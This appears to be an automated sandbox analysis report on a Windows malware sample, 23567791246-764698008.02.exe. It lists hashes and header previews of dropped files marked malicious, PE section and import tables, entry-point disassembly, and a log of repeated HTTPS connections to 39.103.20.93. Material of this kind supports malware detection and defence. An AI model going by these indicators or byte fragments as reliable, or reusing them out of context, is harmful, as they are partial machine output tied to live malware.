                                                  Entropy (8bit):6.350273548571922
                                                  Encrypted:false
                                                  SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                                  MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                  SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                                  SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                                  SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):122880
                                                  Entropy (8bit):6.00205135276644
                                                  Encrypted:false
                                                  SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52FN:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gN
                                                  MD5:62908003EB50F4A200BCBBE91523B4B3
                                                  SHA1:C39C0BA8D1116C144E0AD329B9B341F14AB90E90
                                                  SHA-256:14407BCB7225B8AA323DC6B89EC3B4E76A1A32FD7CD89BE40EC6500A314F72E8
                                                  SHA-512:5527C6109B254B630E3E85A249DF1BCBC9927BE70D63077F072B2CA88CCBBF271420CCD2048FA2054921909A12874C0CBD1F932899A04742C1392E260D52E91E
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\23567791246-764698008.02.exe
                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):28272
                                                  Entropy (8bit):6.228886264319841
                                                  Encrypted:false
                                                  SSDEEP:384:R3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/Z:ROUkgfdZ9pRyv+uPzCMHo3q4tDgh3
                                                  MD5:757A05F40807C8138A16BD2ACABFF1A4
                                                  SHA1:9D2E3F16D2B877D2F2399B1BB8D825B05BA51AE5
                                                  SHA-256:DB5FE428D6E069AB0B6D1C33F654144161526EFF5FFF076BC503F6E0FA153831
                                                  SHA-512:FE2E452261251EE7A58723AEC2DE8868C99CF6F208C59D4F7537A43142581EBB60D066FC39DCCE9AE050E7DE73CF269E7A4AE5C5787090BE5C0D158F56471DF1
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...........................................................................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................
                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Entropy (8bit):0.12357335021918182
                                                  TrID:
                                                  • Win64 Executable GUI (202006/5) 77.37%
                                                  • InstallShield setup (43055/19) 16.49%
                                                  • Win64 Executable (generic) (12005/4) 4.60%
                                                  • Generic Win/DOS Executable (2004/3) 0.77%
                                                  • DOS Executable Generic (2002/1) 0.77%
                                                  File name:23567791246-764698008.02.exe
                                                  File size:30'976'000 bytes
                                                  MD5:8a4c55e9db32ea50154ffaec17ea2ff7
                                                  SHA1:8fd20b312c40ae674ae5f00cba6a1792309f0182
                                                  SHA256:fa4cc6dfd5b8932c3acd2b5fb952bac9c8a9068fcceee82a5b0a1d63dd204d53
                                                  SHA512:669a2a6d281fc095cd6b0519e96f51f7c80de4c33318982e914c00abc259a6f7085f6c2c58f943b18cf35f21f893c5af471cf5931fbb3a269963ec4ebc083d83
                                                  SSDEEP:6144:nMDfybtO3337mTJB4XG/V2wc0sTBHY/VxN7k/P:nfbtO3nuRsTy/Vxqn
                                                  TLSH:40679E5A235411F8E47BE178C451AB12E3F238060360679F1BA557BEDF332A1BD2939E
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o."..eq..eq..eqY@.q..eq...q..eq...q..eq.v.q..eq..dq..eq...qk.eq...q..eq...q..eqRich..eq........PE..d...AJ.e..........#........
                                                  Icon Hash:ac8c964f49e38f96
                                                  Entrypoint:0x14000da8c
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x140000000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x65094A41 [Tue Sep 19 07:14:09 2023 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:2
                                                  File Version Major:5
                                                  File Version Minor:2
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:2
                                                  Import Hash:7aa7753ae6e60551350953dee886e4bc
                                                  Instruction
                                                  dec eax
                                                  sub esp, 28h
                                                  call 00007F3228C301D4h
                                                  dec eax
                                                  add esp, 28h
                                                  jmp 00007F3228C1DECCh
                                                  int3
                                                  int3
                                                  dec eax
                                                  test ecx, ecx
                                                  je 00007F3228C2A949h
                                                  push ebx
                                                  dec eax
                                                  sub esp, 20h
                                                  dec esp
                                                  mov eax, ecx
                                                  dec eax
                                                  mov ecx, dword ptr [0001EC34h]
                                                  xor edx, edx
                                                  call dword ptr [00013634h]
                                                  test eax, eax
                                                  jne 00007F3228C2A929h
                                                  call 00007F3228C2CA70h
                                                  dec eax
                                                  mov ebx, eax
                                                  call dword ptr [000135A2h]
                                                  mov ecx, eax
                                                  call 00007F3228C2CA18h
                                                  mov dword ptr [ebx], eax
                                                  dec eax
                                                  add esp, 20h
                                                  pop ebx
                                                  ret
                                                  int3
                                                  int3
                                                  int3
                                                  dec eax
                                                  mov dword ptr [esp+08h], ebx
                                                  push ebp
                                                  push esi
                                                  push edi
                                                  inc ecx
                                                  push esp
                                                  inc ecx
                                                  push esi
                                                  dec eax
                                                  mov ebp, esp
                                                  dec eax
                                                  sub esp, 30h
                                                  dec eax
                                                  and dword ptr [ebp+48h], 00000000h
                                                  cmp dword ptr [000204D1h], 00000000h
                                                  dec eax
                                                  mov esi, edx
                                                  dec eax
                                                  mov edi, ecx
                                                  jne 00007F3228C2A91Ah
                                                  or eax, FFFFFFFFh
                                                  jmp 00007F3228C2AB55h
                                                  dec eax
                                                  test ecx, ecx
                                                  jne 00007F3228C2A924h
                                                  call 00007F3228C2CA1Ch
                                                  mov dword ptr [eax], 00000016h
                                                  call 00007F3228C2DB2Dh
                                                  jmp 00007F3228C2A8F3h
                                                  dec eax
                                                  test edx, edx
                                                  jne 00007F3228C2A971h
                                                  inc esp
                                                  lea esi, dword ptr [edx+3Dh]
                                                  inc ecx
                                                  mov edx, esi
                                                  call 00007F3228C30C5Ah
                                                  dec eax
                                                  test eax, eax
                                                  je 00007F3228C2A932h
                                                  dec eax
                                                  mov ecx, eax
                                                  mov ebx, 00007FFFh
                                                  dec eax
                                                  sub ecx, edi
                                                  dec eax
                                                  cmp ecx, ebx
                                                  jnl 00007F3228C2A8DAh
                                                  dec eax
                                                  lea ecx, dword ptr [eax+01h]
                                                  mov edx, ebx
                                                  call 00007F3228C2A936h
                                                  Programming Language:
                                                  • [C++] VS2010 SP1 build 40219
                                                  • [ASM] VS2010 SP1 build 40219
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [ C ] VS2010 SP1 build 40219
                                                  • [RES] VS2010 SP1 build 40219
                                                  • [LNK] VS2010 SP1 build 40219
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x28db80x64.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d890000x6ed8.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d870000x1278.pdata
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d900000x220.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x213d00x1c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x210000x358.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x1fa910x1fc0053a15f182a3f6a33907de308277d4859False0.5508196973425197data6.5120642832795985IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x210000x891e0x8a003f4d1d30bbb9e95bde0203f2eb9a8a7dFalse0.5594429347826086PGP symmetric key encrypted data - Plaintext or unencrypted data6.221489096817816IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x2a0000x1d5cff80x1d594002f80943750265dc13b2a63a8d6cd8274unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .pdata0x1d870000x12780x14006a788b674bc643eb1b27f4996ae25318False0.4650390625data5.019530618183155IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .rsrc0x1d890000x6ed80x7000d0eca6b0619663a0ec38c4886dfde36fFalse0.44259207589285715data6.209787661449653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x1d900000x4c60x60022de6777a2041c9ecb8c63cf13555b39False0.2571614583333333data2.5588819321780396IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0x1d892b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.5101351351351351
                                                  RT_ICON0x1d893d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5686416184971098
                                                  RT_ICON0x1d899400x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.7712765957446809
                                                  RT_ICON0x1d89da80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.4112903225806452
                                                  RT_ICON0x1d8a0900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.506768953068592
                                                  RT_ICON0x1d8a9380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.6142120075046904
                                                  RT_ICON0x1d8b9e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.29573170731707316
                                                  RT_ICON0x1d8c0480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.40298507462686567
                                                  RT_ICON0x1d8cef00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.47354771784232363
                                                  RT_GROUP_ICON0x1d8f4980x84data0.6363636363636364
                                                  RT_VERSION0x1d8f51c0x348data0.4583333333333333
                                                  RT_MANIFEST0x1d8f8640x673ASCII text0.4239854633555421
                                                  DLLImport
                                                  ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegEnumKeyA, RegQueryValueExA
                                                  USER32.dllCharNextExA, MessageBoxA
                                                  COMCTL32.dllInitCommonControlsEx
                                                  KERNEL32.dllCreateFileW, GetCommandLineA, GetModuleFileNameA, QueryPerformanceCounter, QueryPerformanceFrequency, LocalFree, FormatMessageA, GetLastError, CloseHandle, GetExitCodeProcess, WaitForSingleObject, CreateProcessA, GetProcAddress, GetModuleHandleA, LoadLibraryA, GetExitCodeThread, FindFirstFileA, FindNextFileA, FindClose, GetModuleHandleW, ExitProcess, DecodePointer, GetStartupInfoW, HeapFree, MultiByteToWideChar, GetCurrentProcessId, EnterCriticalSection, LeaveCriticalSection, HeapAlloc, HeapReAlloc, FileTimeToSystemTime, FileTimeToLocalFileTime, GetDriveTypeA, FindFirstFileExA, GetFileAttributesA, ExitThread, GetCurrentThreadId, CreateThread, SetFilePointer, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, EncodePointer, LoadLibraryW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, TerminateProcess, GetCurrentProcess, FlsGetValue, FlsSetValue, FlsFree, SetLastError, FlsAlloc, RtlUnwindEx, WriteFile, GetStdHandle, GetModuleFileNameW, WideCharToMultiByte, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, HeapSetInformation, GetVersion, HeapCreate, GetTickCount, GetSystemTimeAsFileTime, SetEnvironmentVariableW, SetEnvironmentVariableA, Sleep, SetStdHandle, GetConsoleCP, GetConsoleMode, GetFullPathNameA, GetFileInformationByHandle, PeekNamedPipe, CreateFileA, GetCurrentDirectoryW, FlushFileBuffers, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, CompareStringW, ReadFile, WriteConsoleW, GetDriveTypeW, SetEndOfFile, GetProcessHeap, GetTimeZoneInformation, LCMapStringW, VirtualAlloc
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 7, 2025 09:59:24.766513109 CET49977443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:24.766563892 CET4434997739.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:24.766645908 CET49977443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:25.103828907 CET49977443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:25.103852987 CET4434997739.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:26.345864058 CET4434997739.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:26.345941067 CET49977443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:26.346524954 CET4434997739.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:26.346579075 CET49977443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:26.388926983 CET49977443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:26.388933897 CET4434997739.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:26.389569044 CET4434997739.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:26.389612913 CET49977443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:26.391274929 CET49977443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:26.435333014 CET4434997739.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:26.731779099 CET4434997739.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:26.731894016 CET4434997739.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:26.731931925 CET49977443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:26.731956959 CET49977443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:26.737826109 CET49977443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:26.737847090 CET4434997739.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:26.823683977 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:26.823725939 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:26.823818922 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:26.824022055 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:26.824033976 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.048401117 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.048491001 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.049005985 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.049014091 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.049217939 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.049221992 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.388945103 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.388964891 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.389028072 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.389039040 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.389086008 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.389447927 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.389507055 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.391094923 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.391165018 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.394968033 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.395025969 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.475683928 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.475765944 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.476150036 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.476216078 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.476757050 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.476785898 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.476813078 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.476819038 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.476830006 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.476859093 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.477627993 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.477679014 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.478319883 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.478374958 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.479891062 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.479944944 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.480071068 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.480124950 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.482031107 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.482085943 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.561605930 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.561650991 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.561672926 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.561685085 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.561696053 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.561722994 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.562175035 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.562208891 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.562231064 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.562236071 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.562252045 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.562273979 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.562500954 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.562547922 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.562604904 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.562649965 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.563108921 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.563162088 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.563251019 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.563292980 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.563469887 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.563500881 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.563510895 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.563513994 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.563539028 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.563553095 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.564115047 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.564167023 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.564315081 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.564342976 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.564357042 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.564361095 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.564383030 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.564390898 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.565753937 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.565810919 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.567898989 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.567950964 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.567974091 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.568021059 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.648454905 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.648582935 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.648638964 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.648686886 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.648787975 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.648833036 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.648972034 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.649017096 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.649020910 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.649039030 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.649058104 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.649092913 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.649970055 CET49978443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.649981976 CET4434997839.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.686002970 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.686048031 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:28.686131001 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.686300039 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:28.686316013 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:29.927773952 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:29.927861929 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:29.928385973 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:29.928394079 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:29.928563118 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:29.928569078 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.278229952 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.278250933 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.278320074 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.278332949 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.278377056 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.278707027 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.278759003 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.280379057 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.280442953 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.284482956 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.284540892 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.364907980 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.364947081 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.364989996 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.364999056 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.365015030 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.365040064 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.365257978 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.365313053 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.365746021 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.365803003 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.365880966 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.365931034 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.367058992 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.367111921 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.369117022 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.369168043 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.369360924 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.369410038 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.371150970 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.371198893 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.452044010 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.452076912 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.452121973 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.452130079 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.452157974 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.452162981 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.452177048 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.452184916 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.452214956 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.452231884 CET49979443192.168.2.539.103.20.93
